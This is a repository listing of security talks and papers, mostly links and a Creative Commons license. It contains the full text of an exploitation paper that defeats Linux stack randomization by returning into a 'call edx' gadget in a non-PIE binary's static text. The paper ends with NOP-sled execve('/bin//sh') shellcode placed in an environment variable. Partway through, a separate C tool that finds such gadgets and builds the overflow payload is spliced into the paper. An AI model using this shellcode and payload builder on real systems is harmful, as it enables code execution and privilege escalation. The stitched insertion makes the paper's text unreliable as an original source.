├── CryptoPartyLondon-DogAteMyCryptoKeys.ppt ├── DogAteMyCryptoKeysv2.pdf ├── EquationGroupUNIX.xlsx ├── HackerHouse_A_Blockchain_Quest.pdf ├── HackerHouse_iOS_IdentificationChart_A0.pdf ├── HackerHouse_iOS_IdentificationChart_A1.pdf ├── HackerHouse_iOS_IdentificationChart_WebGraphic.pdf ├── Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx ├── LICENSE.txt ├── Pyongyang_2407_HackerHouse_dc526.pdf ├── README.md ├── Snoopcon_SpacePony.pdf ├── VAstacksmash.txt ├── apple_A6_decap.zip ├── learn_morse.pdf └── tcp_blind_scanning_via_mIRC.txt /CryptoPartyLondon-DogAteMyCryptoKeys.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/CryptoPartyLondon-DogAteMyCryptoKeys.ppt -------------------------------------------------------------------------------- /DogAteMyCryptoKeysv2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/DogAteMyCryptoKeysv2.pdf -------------------------------------------------------------------------------- /EquationGroupUNIX.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/EquationGroupUNIX.xlsx -------------------------------------------------------------------------------- /HackerHouse_A_Blockchain_Quest.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_A_Blockchain_Quest.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_A0.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_A0.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_A1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_A1.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_WebGraphic.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_WebGraphic.pdf -------------------------------------------------------------------------------- /Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Attribution-NonCommercial-NoDerivatives 4.0 International 2 | 3 | ======================================================================= 4 | 5 | Creative Commons Corporation ("Creative Commons") is not a law firm and 6 | does not provide legal services or legal advice. Distribution of 7 | Creative Commons public licenses does not create a lawyer-client or 8 | other relationship. 
Creative Commons makes its licenses and related 9 | information available on an "as-is" basis. Creative Commons gives no 10 | warranties regarding its licenses, any material licensed under their 11 | terms and conditions, or any related information. Creative Commons 12 | disclaims all liability for damages resulting from their use to the 13 | fullest extent possible. 14 | 15 | Using Creative Commons Public Licenses 16 | 17 | Creative Commons public licenses provide a standard set of terms and 18 | conditions that creators and other rights holders may use to share 19 | original works of authorship and other material subject to copyright 20 | and certain other rights specified in the public license below. The 21 | following considerations are for informational purposes only, are not 22 | exhaustive, and do not form part of our licenses. 23 | 24 | Considerations for licensors: Our public licenses are 25 | intended for use by those authorized to give the public 26 | permission to use material in ways otherwise restricted by 27 | copyright and certain other rights. Our licenses are 28 | irrevocable. Licensors should read and understand the terms 29 | and conditions of the license they choose before applying it. 30 | Licensors should also secure all rights necessary before 31 | applying our licenses so that the public can reuse the 32 | material as expected. Licensors should clearly mark any 33 | material not subject to the license. This includes other CC- 34 | licensed material, or material used under an exception or 35 | limitation to copyright. More considerations for licensors: 36 | wiki.creativecommons.org/Considerations_for_licensors 37 | 38 | Considerations for the public: By using one of our public 39 | licenses, a licensor grants the public permission to use the 40 | licensed material under specified terms and conditions. 
If 41 | the licensor's permission is not necessary for any reason--for 42 | example, because of any applicable exception or limitation to 43 | copyright--then that use is not regulated by the license. Our 44 | licenses grant only permissions under copyright and certain 45 | other rights that a licensor has authority to grant. Use of 46 | the licensed material may still be restricted for other 47 | reasons, including because others have copyright or other 48 | rights in the material. A licensor may make special requests, 49 | such as asking that all changes be marked or described. 50 | Although not required by our licenses, you are encouraged to 51 | respect those requests where reasonable. More considerations 52 | for the public: 53 | wiki.creativecommons.org/Considerations_for_licensees 54 | 55 | ======================================================================= 56 | 57 | Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 58 | International Public License 59 | 60 | By exercising the Licensed Rights (defined below), You accept and agree 61 | to be bound by the terms and conditions of this Creative Commons 62 | Attribution-NonCommercial-NoDerivatives 4.0 International Public 63 | License ("Public License"). To the extent this Public License may be 64 | interpreted as a contract, You are granted the Licensed Rights in 65 | consideration of Your acceptance of these terms and conditions, and the 66 | Licensor grants You such rights in consideration of benefits the 67 | Licensor receives from making the Licensed Material available under 68 | these terms and conditions. 69 | 70 | 71 | Section 1 -- Definitions. 72 | 73 | a. 
Adapted Material means material subject to Copyright and Similar 74 | Rights that is derived from or based upon the Licensed Material 75 | and in which the Licensed Material is translated, altered, 76 | arranged, transformed, or otherwise modified in a manner requiring 77 | permission under the Copyright and Similar Rights held by the 78 | Licensor. For purposes of this Public License, where the Licensed 79 | Material is a musical work, performance, or sound recording, 80 | Adapted Material is always produced where the Licensed Material is 81 | synched in timed relation with a moving image. 82 | 83 | b. Copyright and Similar Rights means copyright and/or similar rights 84 | closely related to copyright including, without limitation, 85 | performance, broadcast, sound recording, and Sui Generis Database 86 | Rights, without regard to how the rights are labeled or 87 | categorized. For purposes of this Public License, the rights 88 | specified in Section 2(b)(1)-(2) are not Copyright and Similar 89 | Rights. 90 | 91 | c. Effective Technological Measures means those measures that, in the 92 | absence of proper authority, may not be circumvented under laws 93 | fulfilling obligations under Article 11 of the WIPO Copyright 94 | Treaty adopted on December 20, 1996, and/or similar international 95 | agreements. 96 | 97 | d. Exceptions and Limitations means fair use, fair dealing, and/or 98 | any other exception or limitation to Copyright and Similar Rights 99 | that applies to Your use of the Licensed Material. 100 | 101 | e. Licensed Material means the artistic or literary work, database, 102 | or other material to which the Licensor applied this Public 103 | License. 104 | 105 | f. Licensed Rights means the rights granted to You subject to the 106 | terms and conditions of this Public License, which are limited to 107 | all Copyright and Similar Rights that apply to Your use of the 108 | Licensed Material and that the Licensor has authority to license. 109 | 110 | g. 
Licensor means the individual(s) or entity(ies) granting rights 111 | under this Public License. 112 | 113 | h. NonCommercial means not primarily intended for or directed towards 114 | commercial advantage or monetary compensation. For purposes of 115 | this Public License, the exchange of the Licensed Material for 116 | other material subject to Copyright and Similar Rights by digital 117 | file-sharing or similar means is NonCommercial provided there is 118 | no payment of monetary compensation in connection with the 119 | exchange. 120 | 121 | i. Share means to provide material to the public by any means or 122 | process that requires permission under the Licensed Rights, such 123 | as reproduction, public display, public performance, distribution, 124 | dissemination, communication, or importation, and to make material 125 | available to the public including in ways that members of the 126 | public may access the material from a place and at a time 127 | individually chosen by them. 128 | 129 | j. Sui Generis Database Rights means rights other than copyright 130 | resulting from Directive 96/9/EC of the European Parliament and of 131 | the Council of 11 March 1996 on the legal protection of databases, 132 | as amended and/or succeeded, as well as other essentially 133 | equivalent rights anywhere in the world. 134 | 135 | k. You means the individual or entity exercising the Licensed Rights 136 | under this Public License. Your has a corresponding meaning. 137 | 138 | 139 | Section 2 -- Scope. 140 | 141 | a. License grant. 142 | 143 | 1. Subject to the terms and conditions of this Public License, 144 | the Licensor hereby grants You a worldwide, royalty-free, 145 | non-sublicensable, non-exclusive, irrevocable license to 146 | exercise the Licensed Rights in the Licensed Material to: 147 | 148 | a. reproduce and Share the Licensed Material, in whole or 149 | in part, for NonCommercial purposes only; and 150 | 151 | b. 
produce and reproduce, but not Share, Adapted Material 152 | for NonCommercial purposes only. 153 | 154 | 2. Exceptions and Limitations. For the avoidance of doubt, where 155 | Exceptions and Limitations apply to Your use, this Public 156 | License does not apply, and You do not need to comply with 157 | its terms and conditions. 158 | 159 | 3. Term. The term of this Public License is specified in Section 160 | 6(a). 161 | 162 | 4. Media and formats; technical modifications allowed. The 163 | Licensor authorizes You to exercise the Licensed Rights in 164 | all media and formats whether now known or hereafter created, 165 | and to make technical modifications necessary to do so. The 166 | Licensor waives and/or agrees not to assert any right or 167 | authority to forbid You from making technical modifications 168 | necessary to exercise the Licensed Rights, including 169 | technical modifications necessary to circumvent Effective 170 | Technological Measures. For purposes of this Public License, 171 | simply making modifications authorized by this Section 2(a) 172 | (4) never produces Adapted Material. 173 | 174 | 5. Downstream recipients. 175 | 176 | a. Offer from the Licensor -- Licensed Material. Every 177 | recipient of the Licensed Material automatically 178 | receives an offer from the Licensor to exercise the 179 | Licensed Rights under the terms and conditions of this 180 | Public License. 181 | 182 | b. No downstream restrictions. You may not offer or impose 183 | any additional or different terms or conditions on, or 184 | apply any Effective Technological Measures to, the 185 | Licensed Material if doing so restricts exercise of the 186 | Licensed Rights by any recipient of the Licensed 187 | Material. 188 | 189 | 6. No endorsement. 
Nothing in this Public License constitutes or 190 | may be construed as permission to assert or imply that You 191 | are, or that Your use of the Licensed Material is, connected 192 | with, or sponsored, endorsed, or granted official status by, 193 | the Licensor or others designated to receive attribution as 194 | provided in Section 3(a)(1)(A)(i). 195 | 196 | b. Other rights. 197 | 198 | 1. Moral rights, such as the right of integrity, are not 199 | licensed under this Public License, nor are publicity, 200 | privacy, and/or other similar personality rights; however, to 201 | the extent possible, the Licensor waives and/or agrees not to 202 | assert any such rights held by the Licensor to the limited 203 | extent necessary to allow You to exercise the Licensed 204 | Rights, but not otherwise. 205 | 206 | 2. Patent and trademark rights are not licensed under this 207 | Public License. 208 | 209 | 3. To the extent possible, the Licensor waives any right to 210 | collect royalties from You for the exercise of the Licensed 211 | Rights, whether directly or through a collecting society 212 | under any voluntary or waivable statutory or compulsory 213 | licensing scheme. In all other cases the Licensor expressly 214 | reserves any right to collect such royalties, including when 215 | the Licensed Material is used other than for NonCommercial 216 | purposes. 217 | 218 | 219 | Section 3 -- License Conditions. 220 | 221 | Your exercise of the Licensed Rights is expressly made subject to the 222 | following conditions. 223 | 224 | a. Attribution. 225 | 226 | 1. If You Share the Licensed Material, You must: 227 | 228 | a. retain the following if it is supplied by the Licensor 229 | with the Licensed Material: 230 | 231 | i. identification of the creator(s) of the Licensed 232 | Material and any others designated to receive 233 | attribution, in any reasonable manner requested by 234 | the Licensor (including by pseudonym if 235 | designated); 236 | 237 | ii. 
a copyright notice; 238 | 239 | iii. a notice that refers to this Public License; 240 | 241 | iv. a notice that refers to the disclaimer of 242 | warranties; 243 | 244 | v. a URI or hyperlink to the Licensed Material to the 245 | extent reasonably practicable; 246 | 247 | b. indicate if You modified the Licensed Material and 248 | retain an indication of any previous modifications; and 249 | 250 | c. indicate the Licensed Material is licensed under this 251 | Public License, and include the text of, or the URI or 252 | hyperlink to, this Public License. 253 | 254 | For the avoidance of doubt, You do not have permission under 255 | this Public License to Share Adapted Material. 256 | 257 | 2. You may satisfy the conditions in Section 3(a)(1) in any 258 | reasonable manner based on the medium, means, and context in 259 | which You Share the Licensed Material. For example, it may be 260 | reasonable to satisfy the conditions by providing a URI or 261 | hyperlink to a resource that includes the required 262 | information. 263 | 264 | 3. If requested by the Licensor, You must remove any of the 265 | information required by Section 3(a)(1)(A) to the extent 266 | reasonably practicable. 267 | 268 | 269 | Section 4 -- Sui Generis Database Rights. 270 | 271 | Where the Licensed Rights include Sui Generis Database Rights that 272 | apply to Your use of the Licensed Material: 273 | 274 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right 275 | to extract, reuse, reproduce, and Share all or a substantial 276 | portion of the contents of the database for NonCommercial purposes 277 | only and provided You do not Share Adapted Material; 278 | 279 | b. if You include all or a substantial portion of the database 280 | contents in a database in which You have Sui Generis Database 281 | Rights, then the database in which You have Sui Generis Database 282 | Rights (but not its individual contents) is Adapted Material; and 283 | 284 | c. 
You must comply with the conditions in Section 3(a) if You Share 285 | all or a substantial portion of the contents of the database. 286 | 287 | For the avoidance of doubt, this Section 4 supplements and does not 288 | replace Your obligations under this Public License where the Licensed 289 | Rights include other Copyright and Similar Rights. 290 | 291 | 292 | Section 5 -- Disclaimer of Warranties and Limitation of Liability. 293 | 294 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE 295 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS 296 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF 297 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, 298 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, 299 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR 300 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, 301 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT 302 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT 303 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. 304 | 305 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE 306 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, 307 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, 308 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, 309 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR 310 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN 311 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR 312 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR 313 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. 314 | 315 | c. The disclaimer of warranties and limitation of liability provided 316 | above shall be interpreted in a manner that, to the extent 317 | possible, most closely approximates an absolute disclaimer and 318 | waiver of all liability. 
319 | 320 | 321 | Section 6 -- Term and Termination. 322 | 323 | a. This Public License applies for the term of the Copyright and 324 | Similar Rights licensed here. However, if You fail to comply with 325 | this Public License, then Your rights under this Public License 326 | terminate automatically. 327 | 328 | b. Where Your right to use the Licensed Material has terminated under 329 | Section 6(a), it reinstates: 330 | 331 | 1. automatically as of the date the violation is cured, provided 332 | it is cured within 30 days of Your discovery of the 333 | violation; or 334 | 335 | 2. upon express reinstatement by the Licensor. 336 | 337 | For the avoidance of doubt, this Section 6(b) does not affect any 338 | right the Licensor may have to seek remedies for Your violations 339 | of this Public License. 340 | 341 | c. For the avoidance of doubt, the Licensor may also offer the 342 | Licensed Material under separate terms or conditions or stop 343 | distributing the Licensed Material at any time; however, doing so 344 | will not terminate this Public License. 345 | 346 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public 347 | License. 348 | 349 | 350 | Section 7 -- Other Terms and Conditions. 351 | 352 | a. The Licensor shall not be bound by any additional or different 353 | terms or conditions communicated by You unless expressly agreed. 354 | 355 | b. Any arrangements, understandings, or agreements regarding the 356 | Licensed Material not stated herein are separate from and 357 | independent of the terms and conditions of this Public License. 358 | 359 | 360 | Section 8 -- Interpretation. 361 | 362 | a. For the avoidance of doubt, this Public License does not, and 363 | shall not be interpreted to, reduce, limit, restrict, or impose 364 | conditions on any use of the Licensed Material that could lawfully 365 | be made without permission under this Public License. 366 | 367 | b. 
To the extent possible, if any provision of this Public License is 368 | deemed unenforceable, it shall be automatically reformed to the 369 | minimum extent necessary to make it enforceable. If the provision 370 | cannot be reformed, it shall be severed from this Public License 371 | without affecting the enforceability of the remaining terms and 372 | conditions. 373 | 374 | c. No term or condition of this Public License will be waived and no 375 | failure to comply consented to unless expressly agreed to by the 376 | Licensor. 377 | 378 | d. Nothing in this Public License constitutes or may be interpreted 379 | as a limitation upon, or waiver of, any privileges and immunities 380 | that apply to the Licensor or You, including from the legal 381 | processes of any jurisdiction or authority. 382 | 383 | ======================================================================= 384 | 385 | Creative Commons is not a party to its public 386 | licenses. Notwithstanding, Creative Commons may elect to apply one of 387 | its public licenses to material it publishes and in those instances 388 | will be considered the “Licensor.” The text of the Creative Commons 389 | public licenses is dedicated to the public domain under the CC0 Public 390 | Domain Dedication. Except for the limited purpose of indicating that 391 | material is shared under a Creative Commons public license or as 392 | otherwise permitted by the Creative Commons policies published at 393 | creativecommons.org/policies, Creative Commons does not authorize the 394 | use of the trademark "Creative Commons" or any other trademark or logo 395 | of Creative Commons without its prior written consent including, 396 | without limitation, in connection with any unauthorized modifications 397 | to any of its public licenses or any other arrangements, 398 | understandings, or agreements concerning use of licensed material. For 399 | the avoidance of doubt, this paragraph does not form part of the 400 | public licenses. 
401 | 402 | Creative Commons may be contacted at creativecommons.org. 403 | 404 | -------------------------------------------------------------------------------- /Pyongyang_2407_HackerHouse_dc526.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Pyongyang_2407_HackerHouse_dc526.pdf -------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
# Documents

Presentations, documents and other files released from the team at Hacker House.

| Filename | Description |
| :---: | :--- |
| *apple_A6_decap.zip* | Apple A6 CPU de-capped high resolution photos |
| *CryptoPartyLondon-DogAteMyCryptoKeys.ppt* | Dog Ate My Crypto Keys (cryptoparty LDN) |
| *DogAteMyCryptoKeysv2.pdf* | Dog Ate My Crypto Keys (v2) |
| *EquationGroupUNIX.xlsx* | Equation Group UNIX tools identified from leaks |
| *HackerHouse_A_Blockchain_Quest.pdf* | Blockchain & Cryptocurrency presentation |
| *HackerHouse_iOS_IdentificationChart_A0.pdf* | Apple iDevice identification poster (print A0 size) |
| *HackerHouse_iOS_IdentificationChart_A1.pdf* | Apple iDevice identification poster (print A1 size) |
| *HackerHouse_iOS_IdentificationChart_WebGraphic.pdf* | Apple iDevice identification poster (web graphic) |
| *Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx* | Embedded Device Hacking uncon18 |
| *learn_morse.pdf* | Morse code cheat sheet for amateur radio |
| *Pyongyang_2407_HackerHouse_dc526.pdf* | Pyongyang 2407 Android ROM hacking (dc526 meetup) |
| *Snoopcon_SpacePony.pdf* | Space Pony - riding exploits into orbit (snoopcon) |
| *tcp_blind_scanning_via_mIRC.txt* | TCP/IP blind port scanning attack |
| *VAstacksmash.txt* | Virtual Address randomization exploitation paper |
These files are available under an Attribution-NonCommercial-NoDerivatives 4.0 International license.

-------------------------------------------------------------------------------- /Snoopcon_SpacePony.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Snoopcon_SpacePony.pdf -------------------------------------------------------------------------------- /VAstacksmash.txt: --------------------------------------------------------------------------------
Linux Virtual Addresses Exploitation
====================================
The Linux kernel recently incorporated a protection that randomizes the stack (and, as the maps below
show, the shared library bases as well), making exploitation of stack-based overflows more difficult.
I present here an attack that exploits the addresses which remain static: those of the main executable
itself, which is still mapped at its fixed link-time base. You should be familiar with standard stack
smashing before attempting this paper.

Virtual Addresses
=================
Let's take a look at two instances of the same program, a simple loop(), and compare their maps.
prdelka@gentoo ~ $ cat /proc/5415/maps
08048000-08049000 r-xp 00000000 03:01 493449    /home/prdelka/env
08049000-0804a000 rw-p 00000000 03:01 493449    /home/prdelka/env
b7e02000-b7f0b000 r-xp 00000000 03:01 229995    /lib/libc-2.3.5.so
b7f0b000-b7f0c000 ---p 00109000 03:01 229995    /lib/libc-2.3.5.so
b7f0c000-b7f0d000 r--p 00109000 03:01 229995    /lib/libc-2.3.5.so
b7f0d000-b7f10000 rw-p 0010a000 03:01 229995    /lib/libc-2.3.5.so
b7f10000-b7f13000 rw-p b7f10000 00:00 0
b7f1f000-b7f34000 r-xp 00000000 03:01 230174    /lib/ld-2.3.5.so
b7f34000-b7f35000 r--p 00014000 03:01 230174    /lib/ld-2.3.5.so
b7f35000-b7f36000 rw-p 00015000 03:01 230174    /lib/ld-2.3.5.so
bfd1f000-bfd34000 rw-p bfd1f000 00:00 0         [stack]
ffffe000-fffff000 ---p 00000000 00:00 0         [vdso]

prdelka@gentoo ~ $ cat /proc/5426/maps
08048000-08049000 r-xp 00000000 03:01 493449    /home/prdelka/env
08049000-0804a000 rw-p 00000000 03:01 493449    /home/prdelka/env
b7df6000-b7eff000 r-xp 00000000 03:01 229995    /lib/libc-2.3.5.so
b7eff000-b7f00000 ---p 00109000 03:01 229995    /lib/libc-2.3.5.so
b7f00000-b7f01000 r--p 00109000 03:01 229995    /lib/libc-2.3.5.so
b7f01000-b7f04000 rw-p 0010a000 03:01 229995    /lib/libc-2.3.5.so
b7f04000-b7f07000 rw-p b7f04000 00:00 0
b7f13000-b7f28000 r-xp 00000000 03:01 230174    /lib/ld-2.3.5.so
b7f28000-b7f29000 r--p 00014000 03:01 230174    /lib/ld-2.3.5.so
b7f29000-b7f2a000 rw-p 00015000 03:01 230174    /lib/ld-2.3.5.so
bfc0e000-bfc28000 rw-p bfc0e000 00:00 0         [stack]
ffffe000-fffff000 ---p 00000000 00:00 0         [vdso]

We can see that the stack is randomized along with the libraries, making ret-into-libc difficult.
However, one thing is constant between the two processes: the executable's own text and data pages,
which in both runs are mapped from file offset 0 at the link-time base 0x08048000.

08048000-08049000 r-xp 00000000 03:01 493449    /home/prdelka/env
08049000-0804a000 rw-p 00000000 03:01 493449    /home/prdelka/env

So we must find our return address here.
Let us take a look now at a vulnerable program.

prdelka@gentoo ~ $ cat bug.c
#include <string.h>

int main(int argc,char* argv[]){
    char buffer[100];
    strcpy(buffer,argv[1]);
    return 1;
}

We will now overflow the stack and look at the registers, running ./bug `perl -e 'print "A"x5000'`
under GDB.

Program received signal SIGSEGV, Segmentation fault.
Error while running hook_stop:
Invalid type combination in ordering comparison.
0x41414141 in ?? ()
gdb> i r
eax            0x1              0x1
ecx            0xffffe21d       0xffffe21d
edx            0xbfa0b71b       0xbfa0b71b
ebx            0xb7ee6ff4       0xb7ee6ff4
esp            0xbfa08630       0xbfa08630
ebp            0x41414141       0x41414141
esi            0xb7f0dc80       0xb7f0dc80
edi            0xbfa08674       0xbfa08674
eip            0x41414141       0x41414141
eflags         0x10246          0x10246
cs             0x73             0x73
ss             0x7b             0x7b
ds             0x7b             0x7b
es             0x7b             0x7b
fs             0x0              0x0
gs             0x0              0x0

If we examine more closely we find the randomized address of the environment in EDX: in this example
vulnerability EDX always points at our environment variables, which is often the case in ordinary
command-line argument overflows. Which register (if any) holds such a pointer depends on the code that
ran before the overwritten return, so confirm it in the debugger rather than assuming it.

gdb> x/s $edx
0xbfa0b71b:      "MANPATH=",

To exploit the program we must find a "call edx", "jmp edx" or "push edx; ret" sequence. We can find a
usable return address in the static area of memory belonging to the ELF binary, using ndisasm and grep.

prdelka@gentoo ~ $ ./ndisasm bug | grep "call dx"
00000338          FFD2              call dx
000016F3          FFD2              call dx

(ndisasm decodes in 16-bit mode unless told otherwise, which is why the bytes FF D2 print as "call dx";
with -b 32 the same bytes decode as "call edx". It is the opcode bytes that matter.)

We know the base address of the ELF binary is 0x08048000 and, since the maps show its first segment
mapped from file offset 0 at that base, the file offset 0x338 corresponds to the address 0x8048338.
That is our return address; examining it in GDB confirms the gadget.
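The following is an added example, my own C code and not part of the paper, that automates the step just described and goes slightly beyond it: it checks that the target is an ET_EXEC (fixed-address, non-PIE) ELF32 image, scans every executable PT_LOAD segment for the byte sequences of `call edx`, `jmp edx` and `push edx; ret`, converts file offsets to virtual addresses from the segment's own p_vaddr and p_offset instead of assuming base 0x08048000, and builds the argv[1] payload layout used in the Exploitation section. The ELF struct layouts are the standard ones written out by hand so the file builds without <elf.h>; the 4 MiB file buffer, the tool name `edxgadget` and the sample offsets in the comments are my assumptions.

```c
/* edxgadget.c: find call/jmp-edx gadgets in the fixed-address text of an ELF32 executable and build
 * the argv[1] payload that returns into one of them. Added example, not the paper's own code.
 * Build: gcc -std=c99 -Wall -o edxgadget edxgadget.c ; run: ./edxgadget ./bug */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Minimal ELF32 header layouts (per the ELF spec) so this builds without <elf.h>. */
typedef struct {
    uint8_t  e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} elf32_ehdr_t;                                   /* 52 bytes */
typedef struct {
    uint32_t p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align;
} elf32_phdr_t;                                   /* 32 bytes */
enum { EI_CLASS_IDX = 4, ELFCLASS_32 = 1, ETYPE_EXEC = 2, PTYPE_LOAD = 1, PFLAG_X = 1 };

/* Two-byte sequences that transfer control to the address held in EDX. */
typedef struct { const char *name; uint8_t op[2]; } gadget_t;
static const gadget_t GADGETS[] = {
    { "call edx",      { 0xFF, 0xD2 } },
    { "jmp edx",       { 0xFF, 0xE2 } },
    { "push edx; ret", { 0x52, 0xC3 } },
};

typedef struct { uint32_t va; const char *name; } hit_t;

/* Scan an executable segment mapped at seg_va; returns the number of hits stored (at most max).
 * The scan is alignment-agnostic, like grepping ndisasm output: any FF D2 pair is usable. */
size_t find_edx_gadgets(const uint8_t *seg, size_t len, uint32_t seg_va, hit_t *out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off + 1 < len && n < max; off++)
        for (size_t g = 0; g < sizeof GADGETS / sizeof GADGETS[0]; g++)
            if (seg[off] == GADGETS[g].op[0] && seg[off + 1] == GADGETS[g].op[1]) {
                out[n].va = seg_va + (uint32_t)off;
                out[n].name = GADGETS[g].name;
                n++;
                break;
            }
    return n;
}

/* 1 if img is an ELF32 ET_EXEC image, i.e. one the kernel maps at its link-time address.
 * A PIE executable is ET_DYN and is relocated along with everything else, so the paper's
 * static-address trick does not apply to it. */
int elf32_is_fixed_exec(const uint8_t *img, size_t len)
{
    elf32_ehdr_t eh;
    if (len < sizeof eh) return 0;
    memcpy(&eh, img, sizeof eh);                  /* memcpy: img need not be aligned */
    if (memcmp(eh.e_ident, "\x7f" "ELF", 4) != 0) return 0;
    if (eh.e_ident[EI_CLASS_IDX] != ELFCLASS_32) return 0;
    return eh.e_type == ETYPE_EXEC;
}

/* argv[1] payload: pad bytes of NOP, then the gadget address in x86 little-endian byte order. */
size_t build_payload(uint8_t *buf, size_t cap, size_t pad, uint32_t ret_va)
{
    if (cap < pad + 4) return 0;
    memset(buf, 0x90, pad);
    for (int i = 0; i < 4; i++) buf[pad + i] = (uint8_t)(ret_va >> (8 * i));
    return pad + 4;
}

int main(int argc, char **argv)
{
    static uint8_t img[4u << 20];                 /* assumption: binary fits in 4 MiB */
    if (argc != 2) { fprintf(stderr, "usage: %s <elf32-executable>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 1; }
    size_t len = fread(img, 1, sizeof img, f);
    fclose(f);
    if (!elf32_is_fixed_exec(img, len)) {
        fprintf(stderr, "%s: not a fixed-address (non-PIE) ELF32 executable\n", argv[1]);
        return 1;
    }
    elf32_ehdr_t eh;
    memcpy(&eh, img, sizeof eh);
    for (unsigned i = 0; i < eh.e_phnum; i++) {   /* walk the PT_LOAD segments marked executable */
        elf32_phdr_t ph;
        size_t pos = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
        if (pos + sizeof ph > len) break;
        memcpy(&ph, img + pos, sizeof ph);
        if (ph.p_type != PTYPE_LOAD || !(ph.p_flags & PFLAG_X)) continue;
        if (ph.p_offset > len || ph.p_filesz > len - ph.p_offset) continue;
        hit_t hits[64];
        size_t n = find_edx_gadgets(img + ph.p_offset, ph.p_filesz, ph.p_vaddr, hits, 64);
        for (size_t k = 0; k < n; k++)
            printf("0x%08x  %-14s (file offset 0x%x)\n", (unsigned)hits[k].va, hits[k].name,
                   (unsigned)(hits[k].va - ph.p_vaddr + ph.p_offset));
    }
    return 0;
}
```

Run it against the bug binary and pick any address it prints; because the gadget lives in the executable's own pages, it stays valid across runs no matter where the stack and libc land. The VA-to-offset arithmetic uses the segment headers deliberately: a binary linked at a different base, or with a text segment that does not start at file offset 0, would make the paper's "base + ndisasm offset" shortcut wrong.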
0x8048338 <__do_global_dtors_aux+40>:   call   *%edx

Exploitation
============
To exploit the bug we will place our payload in the first environment variable; to find it we run the
'env' command.

prdelka@gentoo ~ $ env
MANPATH=/usr/local/share/man:/usr/share/man:/usr/share/binutils-data/i686-pc-linux-gnu/2.15.92.0.2
/man:/usr/share/gcc-data/i686-pc-linux-gnu/3.3.6/man:/usr/qt/3/doc/man

We will now put our shellcode in this environment variable: a NOP sled followed by an
execve("/bin//sh") payload.

prdelka@gentoo ~ $ export MANPATH=`perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68";print "//sh";print "\x68";print "/bin";print "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";'`
